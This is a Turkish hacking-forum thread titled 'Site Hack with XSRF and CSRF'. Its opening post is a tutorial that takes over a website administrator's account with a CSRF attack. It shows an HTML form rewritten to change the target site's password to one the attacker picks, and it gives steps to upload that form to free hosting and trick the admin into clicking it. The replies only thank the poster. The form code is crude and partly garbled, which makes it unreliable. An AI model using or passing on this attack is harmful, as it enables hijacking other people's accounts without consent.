Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 3
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Xsrf ve Csrf Yöntemi ile Site Hack
Mentalistler
*
avatar
Sivile Alındı
Durum: Çevrimdışı
Seviye Puanı: 25
Yaşam Puanı: 255 / 608
Deneyim: 35 / 100
Rep Sayısı: 190
Mesaj Sayısı: 792
Üyelik Tarihi: 02.10.2013
     
Yorum: #1
Xsrf ve Csrf Yöntemi ile Site Hack
13.07.2014 03:28
Xsrf ve Csrf Yöntemi ile Site Hack / Mentalistler

CSRF/XSRF Nedir ?
- Öncelikle Bu zaafiyetlerin arasındaki fark şudur ; basit bir dosyayı kurbana yedirerek kurbanın şifresini
kurbandan izinsiz ve habersiz olarak değiştirmeye dayalı bir zaafiyettir ve amacıda budur...

CSRF/XSRF Açığı Nasıl Bulunur ?


- Site Scriptini Teleport , Httrack gibi programlarla indirip bakarak ----> Diğer açıklardada olduğu gibi oldukça uğraştırıcı bir iştir.
- Hedef Siteyi Toollar yardımcalığı ile taratarak .(Acunetix,Shadow Security scanner ) gibi...
- Manuel Olarak ( Makalemizdede Buna Değineceğiz )


CSRF/XSRF Nasıl Bulunur Ve Kullanılır ?



- Üyelik sistemi olan bir web sitesi düşünelim ki Aklımıza ilk gelecek siteler ;

--->Sosyal Paylaşım Platformları

--->MyBB,VBulletin, Smf gibi... ->Üzerine Kurulu Siteler


Bu Sitelerin Şifre Değiştirme Bölümlerini Böyle Farz Edelim : https://www.hedefsite.com/settings?tab=a...sword&view ----> Şifremizi Değiştirelim

Şifremizi Değiştirdiğimiz Zaman Böyle Bir Tablo Ortaya Çıkarsa : https://www.hedefsite.com/settings?tab=a...ntalistler ----->Xsrf/Csrf Açığı Mevcuttur.


XSRF/CSRF Açığı Olan Sitede Yapmamız Gerekenler ?


https://www.hedefsite.com/settings?tab=a...ntalistler -----> CTRL-u Veya sağ tuş yaparak sayfa kaynağını görüntüleyerek

<form></form>------> Taglarını Bulmak Ve......

<form method="GET" action="settings?tab=account§ion=password&view">
<input type="text" name="Şifre"> ---------------> Kodlarını Bularak Üzerinde Birkaç Değişiklik Yapmak....
<input type="Submit" Name="Submit" Value="Gönder">
</form>


Bu Değişiklikler:

<form method="GET" action="settings?tab=account§ion=password&view"> -----> Olan Yeri Sitenin Tam Adresiye değiştirmek ...

<form method="GET" action="www.hedefsite.com/settings?tab=account§ion=password&view"> ------> Bu Şekilde...

<input type="text" name="olması istediğiniz şifre"> --------> Olmasını İstediğimiz Şifreyi Yazmak


Değiştirdkten Sonraki Görünecek Kod Parçacığı Aynı Bu Şekilde Olması Lazım....

<form method="GET" action="www.hedefsite.com/settings?tab=account§ion=password&view">
<input type="text" name="olması istediğiniz şifre"> -------------------> Bu Şekilde .....
<input type="Submit" Name="Submit" Value="Gönder">
</form>



1-) Değiştirilen kod parçacığını .html uzantısı olarak kaydedin.

2-).html Uzantılı Dosyanızı Free Hostunuza Atın..

3-)Hedef sitenin admini bu dosyayı tıklatmaya çalışın sm gibi yöntemlerle ..tıkladığı anda hedef sitenin şifresi değişmiş olacaktır..İstediğiniz şifre ile....

Selametle
(Bu konu en son: 26.07.2018 Tarihinde, Saat: 13:06 düzenlenmiştir. Düzenleyen: KingSkrupellos.)
Alinti
M3czup
*
avatar
Teğmen - Ex
Durum: Çevrimdışı
Seviye Puanı: 26
Yaşam Puanı: 629 / 629
Deneyim: 16 / 100
Rep Sayısı: 82
Mesaj Sayısı: 852
Üyelik Tarihi: 18.12.2017
      
Yorum: #2
RE: XSRF-CSRF
26.07.2018 12:38
Teşekkürler, Emeğine Sağlık Smile
Alinti
Hackmen
*
avatar
Sivile Alındı
Durum: Çevrimdışı
Seviye Puanı: 14
Yaşam Puanı: 228 / 346
Deneyim: 87 / 100
Rep Sayısı: 16
Mesaj Sayısı: 253
Üyelik Tarihi: 01.11.2017
     
Yorum: #3
RE: Xsrf ve Csrf Yöntemi ile Site Hack
26.07.2018 15:04
Hide Atsan Güzel Olur
Alinti
d4rb3
*
avatar
Yüzbaşı
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 83 / 231
Deneyim: 26 / 100
Rep Sayısı: 0
Mesaj Sayısı: 126
Üyelik Tarihi: 30.11.2017
     
Yorum: #4
RE: Xsrf ve Csrf Yöntemi ile Site Hack
26.07.2018 18:57
Teşekkürler, Emeğine Sağlık Smile
Alinti



1 Ziyaretçi